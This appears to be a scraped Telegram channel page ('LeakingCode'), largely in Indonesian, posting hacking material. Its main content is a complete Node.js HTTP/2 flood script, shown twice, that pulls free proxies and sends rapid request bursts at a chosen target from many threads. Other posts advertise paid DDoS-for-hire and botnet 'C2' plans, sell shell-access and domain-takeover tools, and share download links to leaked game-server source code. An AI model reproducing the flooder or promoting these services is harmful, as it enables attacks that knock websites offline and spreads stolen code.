LeakingCode | LC On Top!
Open in Telegram
On this channel we leak data. The data that was leaked included various types of data ranging from general data to prohibited data and other similar things Channel Created By @Lintar21
Show more1 757
Subscribers
No data24 hours
No data7 days
+1730 days
Posts Archive
// Multithreading pake cluster
if (cluster.isMaster) {
for (let i = 0; i < args.threads; i++) {
cluster.fork();
}
} else {
setInterval(runFlooder, 1000);
}
``const https = require('https');
const tls = require('tls');
const http2 = require('http2');
const url = require('url');
const crypto = require('crypto');
const cluster = require('cluster');
const axios = require('axios');
const cheerio = require('cheerio');
const { HttpsProxyAgent } = require('https-proxy-agent');
if (process.argv.length < 5) {
console.log(`
Usage: node script.js <target> <duration> <rate> <threads>
`);
process.exit();
}
const args = {
target: process.argv[2],
time: ~~process.argv[3],
rate: ~~process.argv[4],
threads: ~~process.argv[5],
};
const userAgents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'
];
async function scrapeProxies() {
try {
const { data } = await axios.get('https://free-proxy-list.net/');
const $ = cheerio.load(data);
let proxies = [];
$('tbody tr').each((i, elem) => {
const ip = $(elem).find('td').eq(0).text();
const port = $(elem).find('td').eq(1).text();
const httpsEnabled = $(elem).find('td').eq(6).text().trim();
if (httpsEnabled === 'yes') {
proxies.push(`${ip}:${port}`);
}
});
return proxies;
} catch (error) {
console.error('Error scraping proxies:', error);
return [];
}
}
async function runFlooder() {
const parsedTarget = url.parse(args.target);
const proxyList = await scrapeProxies();
if (proxyList.length === 0) {
console.error('Tidak ada proxy yang ditemukan!');
process.exit();
}
const proxy = proxyList[Math.floor(Math.random() * proxyList.length)];
console.log(`Menggunakan proxy: ${proxy}`);
const proxyAgent = new HttpsProxyAgent(`http://${proxy}`);
const tlsOptions = {
ALPNProtocols: ['h2'],
secureOptions: crypto.constants.SSL_OP_NO_SSLv3,
secure: true,
rejectUnauthorized: false,
};
const tlsConn = tls.connect(443, parsedTarget.host, tlsOptions);
tlsConn.setKeepAlive(true, 60 * 10000);
const client = http2.connect(parsedTarget.href, {
protocol: "https:",
createConnection: () => tlsConn,
agent: proxyAgent, // Proxynya di sini
});
client.on("connect", () => {
setInterval(() => {
for (let i = 0; i < args.rate; i++) {
const headers = {
':method': 'GET',
':path': parsedTarget.path,
'User-Agent': userAgents[Math.floor(Math.random() * userAgents.length)],
};
const request = client.request(headers);
request.on("response", response => {
request.close();
request.destroy();
});
request.end();
}
}, 1000);
});
client.on("close", () => {
client.destroy();
return;
});
client.on("error", error => {
client.destroy();
return;
});
}// Multithreading pake cluster
if (cluster.isMaster) {
for (let i = 0; i < args.threads; i++) {
cluster.fork();
}
} else {
setInterval(runFlooder, 1000);
}
``javascript
const https = require('https');
const tls = require('tls');
const http2 = require('http2');
const url = require('url');
const crypto = require('crypto');
const cluster = require('cluster');
const axios = require('axios');
const cheerio = require('cheerio');
const { HttpsProxyAgent } = require('https-proxy-agent');
if (process.argv.length < 5) {
console.log(`
Usage: node script.js <target> <duration> <rate> <threads>
`);
process.exit();
}
const args = {
target: process.argv[2],
time: ~~process.argv[3],
rate: ~~process.argv[4],
threads: ~~process.argv[5],
};
const userAgents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'
];
async function scrapeProxies() {
try {
const { data } = await axios.get('https://free-proxy-list.net/');
const $ = cheerio.load(data);
let proxies = [];
$('tbody tr').each((i, elem) => {
const ip = $(elem).find('td').eq(0).text();
const port = $(elem).find('td').eq(1).text();
const httpsEnabled = $(elem).find('td').eq(6).text().trim();
if (httpsEnabled === 'yes') {
proxies.push(`${ip}:${port}`);
}
});
return proxies;
} catch (error) {
console.error('Error scraping proxies:', error);
return [];
}
}
async function runFlooder() {
const parsedTarget = url.parse(args.target);
const proxyList = await scrapeProxies();
if (proxyList.length === 0) {
console.error('Tidak ada proxy yang ditemukan!');
process.exit();
}
const proxy = proxyList[Math.floor(Math.random() * proxyList.length)];
console.log(`Menggunakan proxy: ${proxy}`);
const proxyAgent = new HttpsProxyAgent(`http://${proxy}`);
const tlsOptions = {
ALPNProtocols: ['h2'],
secureOptions: crypto.constants.SSL_OP_NO_SSLv3,
secure: true,
rejectUnauthorized: false,
};
const tlsConn = tls.connect(443, parsedTarget.host, tlsOptions);
tlsConn.setKeepAlive(true, 60 * 10000);
const client = http2.connect(parsedTarget.href, {
protocol: "https:",
createConnection: () => tlsConn,
agent: proxyAgent, // Proxynya di sini
});
client.on("connect", () => {
setInterval(() => {
for (let i = 0; i < args.rate; i++) {
const headers = {
':method': 'GET',
':path': parsedTarget.path,
'User-Agent': userAgents[Math.floor(Math.random() * userAgents.length)],
};
const request = client.request(headers);
request.on("response", response => {
request.close();
request.destroy();
});
request.end();
}
}, 1000);
});
client.on("close", () => {
client.destroy();
return;
});
client.on("error", error => {
client.destroy();
return;
});
}// Fungsi untuk menangani permintaan GET
function getData(url) {
fetch(url)
.then(response => {
if (!response.ok) {
throw new Error('Gagal mengambil data');
}
return response.json();
})
.then(data => {
console.log('Data GET:', data);
})
.catch(error => {
console.error('Error pada GET:', error);
});
}
// Fungsi untuk menangani permintaan POST
function postData(url, data) {
fetch(url, {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
})
.then(response => {
if (!response.ok) {
throw new Error('Gagal mengirim data POST');
}
return response.json();
})
.then(data => {
console.log('Data POST berhasil dikirim:', data);
})
.catch(error => {
console.error('Error pada POST:', error);
});
}
// Fungsi untuk menangani permintaan PUT
function putData(url, data) {
fetch(url, {
method: 'PUT',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
})
.then(response => {
if (!response.ok) {
throw new Error('Gagal mengirim data PUT');
}
return response.json();
})
.then(data => {
console.log('Data PUT berhasil dikirim:', data);
})
.catch(error => {
console.error('Error pada PUT:', error);
});
}
// Fungsi untuk menangani permintaan DELETE
function deleteData(url) {
fetch(url, {
method: 'DELETE'
})
.then(response => {
if (!response.ok) {
throw new Error('Gagal menghapus data');
}
return response.json();
})
.then(data => {
console.log('Data DELETE berhasil:', data);
})
.catch(error => {
console.error('Error pada DELETE:', error);
});
}
// Fungsi untuk menangani permintaan PATCH
function patchData(url, data) {
fetch(url, {
method: 'PATCH',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
})
.then(response => {
if (!response.ok) {
throw new Error('Gagal mengirim data PATCH');
}
return response.json();
})
.then(data => {
console.log('Data PATCH berhasil dikirim:', data);
})
.catch(error => {
console.error('Error pada PATCH:', error);
});
}
// Contoh penggunaan:
// URL server (gunakan server yang mendukung HTTP/3)
const apiUrl = 'https://example.com/api';
// GET request
getData(`${apiUrl}/items`);
// POST request
postData(`${apiUrl}/items`, { name: 'New Item', price: 100 });
// PUT request (misalnya untuk update data)
putData(`${apiUrl}/items/1`, { name: 'Updated Item', price: 150 });
// DELETE request (untuk menghapus data)
deleteData(`${apiUrl}/items/1`);
// PATCH request (untuk update sebagian data)
patchData(`${apiUrl}/items/1`, { price: 200 });
Catatan:
Semua permintaan menggunakan fetch(), yang merupakan API bawaan modern di JavaScript dan mendukung HTTP/3 jika server mendukungnya.
Jangan lupa untuk memastikan server tujuan mendukung protokol HTTP/3 agar kode ini berjalan menggunakan protokol tersebutRepost from LIService Others
Tools DDoS
Sites We Often Down ( https://t.me/LIServiceOthers/2163 )
Chat @Lintar21
Only 5Slot
Price 200K (Discount)
Repost from Leaking Script/Source GTPS
https://mega.nz/file/hPdmhTbR#CuKah2X0-l-sdlicsjAv7iaUmflflM958p1H4OOpmBE
Growsoul v6.3
Leak By @Leakgt
Repost from Leaking Script/Source GTPS
BEWARE Discord: LyCellionX telegram: Lyscleaking is a scammer and sells SKIDDED SOURCE LINK: https://mega.nz/file/gmEVgCCI#snXJOKHAs6SGzPce7kqfBwqx3cod02xmXnWRInQpCYs
1.67 GB file on MEGA
Leak By Citylight
Repost from Leaking Script/Source GTPS
https://www.mediafire.com/file/huou4nuw6g2uzdv/V38_NEW_BASE_LATEST.rar/file
😹
Itski v38
Leak by Leakin On Top
https://whatsapp.com/channel/0029Vakl3NxBfxoAfZQa411m
[2/9 17.59] null: Leaking Script/Source GTPS:
https://mega.nz/file/oSsx2DyS#ZICDmg-5cra3BQHiY52eoXKHY4oA90mDMbPJqBq_6xs
-Avera Ps + Backup
Supp V4.62+ (stuck fix sendiri login ke server Avera ambil cache nya)
Ini Bukan Newest Avera jdi kalo ad fitur yang ndak bs jangan salahkan saia
Leak By @leakgt
https://mega.nz/file/tf9TgALY#ngKki2K9SOuiR83DxkJzEidLX_cT_VbC4cDf6L_CMFU
Nih cache biar ga stuck
*CPP BEATH / GT3 NEW*
>>> NOTE: GA AMA DABES CUMA SLN LUMAYAN BUAT PALING CODE
>>> CREDIT LEAK: JARZZ
https://mega.nz/file/Pu5EVLTA#ySvjqOMMtYX-_3fcv7LDEx_cY54hKy7dCEpDckftduw
https://mega.nz/file/wTd1nBRa#fj63gBIgMZZ26FRnXceqAuQkzB6Ig0xg266N9Pav-Uc
Leak By @Leakgt
https://www.mediafire.com/file/huou4nuw6g2uzdv/V38_NEW_BASE_LATEST.rar/file
😹
Itski v38
Leak by Leakin On Top
https://whatsapp.com/channel/0029Vakl3NxBfxoAfZQa411m
BEWARE Discord: LyCellionX telegram: Lyscleaking is a scammer and sells SKIDDED SOURCE LINK: https://mega.nz/file/gmEVgCCI#snXJOKHAs6SGzPce7kqfBwqx3cod02xmXnWRInQpCYs
1.67 GB file on MEGA
Leak By Citylight
https://mega.nz/file/hPdmhTbR#CuKah2X0-l-sdlicsjAv7iaUmflflM958p1H4OOpmBE
Growsoul v6.3
Leak By @Leakgt
[2/9 18.01] null: https://mega.nz/file/3SATlSpB#7jo1wjlqEfoa2UStUby59vG1wAjDNvqF9hZpY73HqNM
Cpp growmost V19
Credit -->> Chand
[2/9 18.02] null: https://mega.nz/file/eqhnVAgR#ojaFzxwUCQpyAaWIw1UCBDx1Sudh4_udbw4slZCrSHc
Cpp Victor
Credit -->> Chand
[2/9 18.03] null: https://mega.nz/file/a7YGSaKL#iQgknADnmzdsFdnDeF6kMYilOZ7cUIt-YGd2YQ-MVik
Cpp vynx 1.2
Credit -->> Chand
[2/9 18.04] null: https://mega.nz/file/W2hxhADK#mUd7P7N9Xx4lvByrLsFwisJPuIwscSFF5Qn49jDXNaE
Cpp Alva V3
Credit -->> Chand
[2/9 18.05] null: https://mega.nz/file/oSsx2DyS#ZICDmg-5cra3BQHiY52eoXKHY4oA90mDMbPJqBq_6xs
Cpp Sao
Credit -->> Chand
I'm available for all instructional and hacking services.
✔️TOOL AUTO BACKLINK
✔️TOOL GET SHELL
✔️TOOL GET CPANEL,WHM,WP
✔️TOOL TRAFFIC
✔️Course DD05 Lifetime
✔️Course Takeover Domain By AWS
✔️Course Takeover Domain By Github
✔️Course Hidden Backlink By Github
✔️Course Auto Index 200 Domain/day
✔️Course Make VPS and GET IP Domain
✔️Course Tunnel Complete With Script
✔️Course Tunnel Auto Create Bot Script
✔️Service Make LUCKY WHEEL
And many more for SEO , FULL UNTIL YOU CAN DO!!!
ONLY 2 SLOT AGAIN
contact : @Lintar21
PROOF : @avatarng
No free service ⚠️
Repost from LIService Others
Skrip ini mengumpulkan informasi lengkap tentang sebuah situs web, termasuk detail request dan response, cookies, token CSRF, dan metadata halaman seperti judul dan deskripsi meta. Data yang dikumpulkan disimpan dalam format JSON untuk memudahkan analisis dan dokumentasi.
Module yang perlu di install
npm i pupperteer
Repost from EXECUTOR DDOS [C2 API]📡
OPEN PLANS NEW UPDATE EXECUTOR DDOS [C2-API]
Using EXCUTOR BOTNETS
Bisa juga sebagai alat pentest kekuatan site sebagai uji
____
LAYER7 LAYER4 TLS TCP TLSV3 UDP UAM BYPASS KILLNET HTTPS HTTPS2 TAKY-ALL MIXBILL XYN HTTP-GECKO BYPASS-R2 SYN-FLOOD TLS-HOLD BROWSER___ FEATURED PLANS NONVIP VIP SUPERVIP
1 WEEKS TIMELIMIT 120Sec IDR 150k/20$ 2 WEEKS TIMELIMIT 120Sec IDR 200k/30$ 3 WEEKS TIMELIMIT 120Sec IDR 300K/40$ VIP 1 MOUNTH ACCESS TIMELIMIT 300Sec IDR 500k/60$ VIP___________ Membuka jasa layanan serangan DDOS, Hold Target
1 jam 250k 2 jam 500k 3 jam 750k 1 Day 2 jtPERMANENT ACCESS LIFETIME
IDR 3JT/ 300$Semua Target Kecuali Static R2Dev AMP(50/50) Suspend Web 7 JT MESSAGES TO @Mrcyberteam
